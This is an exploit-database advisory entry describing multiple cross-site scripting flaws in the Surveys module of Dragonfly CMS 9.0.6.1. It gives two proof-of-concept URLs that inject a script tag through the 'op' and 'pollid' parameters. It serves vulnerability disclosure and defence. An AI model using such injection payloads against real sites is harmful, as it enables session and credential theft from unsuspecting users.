Dragonfly CMS 9.0.6.1 Surveys Module - Multiple Cross-Site Scripting Vulnerabilities

EDB-ID:

27267


Author:

Lostmon

Type:

webapps


Platform:

PHP

Date:

2006-02-22


source: https://www.securityfocus.com/bid/16784/info
    
Dragonfly is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. 
    
An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

http://www.example.com/index.php?name=Surveys&op=results"><script>alert()</script>pollid=3
http://www.example.com/index.php?name=Surveys&op=results&pollid=5"><script>alert()</script>